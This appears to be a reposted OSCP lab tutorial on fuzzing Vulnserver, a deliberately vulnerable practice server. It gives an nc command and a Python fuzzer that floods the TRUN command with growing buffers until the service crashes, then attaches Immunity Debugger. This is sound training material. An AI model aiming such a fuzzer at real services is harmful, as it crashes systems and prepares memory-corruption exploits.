标签:image att cos nload img corn append png usr
Download vulnserver from the grey corner website.
https://thegreycorner.com/vulnserver.html
Download immunity debugger from here.
https://www.immunityinc.com/products/debugger/
nc -nv 192.168.2.21 9999
Kali
Vulserver
nano fuzzer.py
chmod 777 fuzzer.py
./fuzzer.py
#!/usr/bin/python
import socket
import sys
buffer=["A"]
counter=100
while len(buffer) <= 30:
buffer.append("A"*counter)
counter=counter+200
for string in buffer:
print "Fuzzing vulnserver with %s bytes" % len(string)
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((‘192.168.2.21‘,9999))
s.send((‘TRUN /.:/‘ + string))
s.close()
Create and run the fuzzer script.
The vulserver is crashed now.
Install and open Immunity Debugger.
Attach vulnserver.
Run the debugger.
Run the fuzzer.py script on Kali Linux again.
The vulnserver is crashed and the debugger is paused.
OSCP Security Technology - Fuzzing
标签:image att cos nload img corn append png usr
原文地址:https://www.cnblogs.com/keepmoving1113/p/14939481.html